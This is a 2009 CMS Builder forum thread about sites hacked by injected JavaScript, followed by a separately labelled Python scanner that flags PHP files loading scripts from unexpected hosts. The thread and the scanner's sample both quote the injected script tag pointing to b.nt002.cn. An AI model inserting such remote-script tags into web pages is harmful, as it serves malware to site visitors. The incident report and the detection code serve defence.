Website hack

4 posts by 3 authors in: Forums > CMS Builder
Last Post: October 5, 2009

By cnorthey - October 3, 2009

I have had a couple of sites that use CMS builder come under attack from hackers. It seems that malicious javascript has been added to my PHP files. I have been in contact with the two different hosts for these sites and they both claim it's most likely the CMS that is causing the vulnerability.

The CMS hadn't been updated in about 6 months and I'm wondering in that time if major security updates had been added. Both clients are actually now considering using another CMS package and I'm reluctant to use this program for future clients unless I'm certain CMS builder wasn't the problem or can ensure this won't happen in the future.

Re: [cnorthey] Website hack

By Kenny - October 3, 2009

Here's a couple of questions that may help determine what the core problem is.

1. Exactly what files were written to by the hackers? (Most Important)

2. What version of CMS are you using?

3. What did the javascript intend to do and was it successful?


Everything (and I mean EVERYTHING) is hack-able. More important is at what point and why would someone hack your website. As a developer, when you find a hole, you patch it. There is so much more to say and speculate about this, but we really need the answers to the above questions in order to speak definitively about the problem.

Please let us know.


Kenny

Re: [sagentic] Website hack

By cnorthey - October 4, 2009

Hi Kenny, thanks for your quick reply.

To answer your questions:

1. The files that have been identified as being hacked are PHP files. For both sites the index.php file has been affected, and one of the sites has a couple of other PHP files in the root directory that have been edited.

2. I have tried to log in to the CMS to obtain the version number, however my client has changed the password for this and the FTP for security reasons and hasn't supplied the new details yet. It was downloaded in February so whatever the latest version was then is what's installed.

3. The line of code put into the PHP was quite simple and calls - <script src=''http"//b.nt002.cn/E/J.js></script>. All browsers have alerted that this site poses a security risk and therefore hasn't affected my computer or others as far as I'm aware. It does however mean that the sites are not accessible at present.

One of the sites is a completely Flash driven site, and all the CMS does is provide a front end for the client to enter the data. I then have written a script that converts the database info into XML so that it can be read by Flash. There is no code that actually feeds data into the PHP page for this site. The other site affected however displays database information using CMS builder functions.

These are both websites for small business and there is no reason why someone would specifically hack them. I think it's something that's automated that's found a loophole in both sites.

I have tested 3 other websites I have created that use CMS builder and all have older versions of the CMS (which will soon be updated) and they are fine so far.

The things that the affected sites have in common are:

- Use CMS builder of course
- Have Flash elements in the index.php file
- Have been updated by myself and my client (who does basic site management only such as uploading via FTP and updating via CMS builder).

Thanks for your help and I hope this information can narrow down what the problem is.
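
Added example, not part of any post in this thread and not CMS Builder code: a Python check that answers the first question above ("exactly what files were written to") by listing every PHP file that loads a script from a host you did not put there. The function names, the allowlisted host cdn.example.com and the sample page are assumptions made for illustration; the last sample line is the tag as quoted in the post above.

```python
import os
import re

# Matches a <script> tag and captures the raw src value up to whitespace or '>'.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*([^>\s]+)", re.IGNORECASE)
# Pulls the host out of an absolute or protocol-relative URL, tolerating
# broken quoting or a missing colon after the scheme.
REMOTE_HOST = re.compile(r"^\W*(?:https?\W{0,2})?//([a-z0-9.-]+)", re.IGNORECASE)


def find_external_scripts(text, allowed_hosts=()):
    """Return (line_number, host) for each script tag loading from a host not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for tag in SCRIPT_SRC.finditer(text):
        host = REMOTE_HOST.match(tag.group(1))
        if host is None:
            continue  # relative path or PHP-generated value: not a remote load
        name = host.group(1).lower().strip(".")
        if name not in allowed:
            findings.append((text.count("\n", 0, tag.start()) + 1, name))
    return findings


def scan_tree(root, allowed_hosts=()):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(".php"):
                continue
            path = os.path.join(folder, filename)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = find_external_scripts(handle.read(), allowed_hosts)
            if hits:
                report[path] = hits
    return report


# Constructed sample page; the last tag is the line quoted in the post above.
SAMPLE = """<?php include 'header.php'; ?>
<script src="js/swfobject.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script src=''http"//b.nt002.cn/E/J.js></script>
"""

if __name__ == "__main__":
    for line_no, host in find_external_scripts(SAMPLE, ["cdn.example.com"]):
        print(f"line {line_no}: script loaded from unexpected host {host}")
```

Run scan_tree against a downloaded copy of the site and compare the flagged files with a known-good backup before restoring anything.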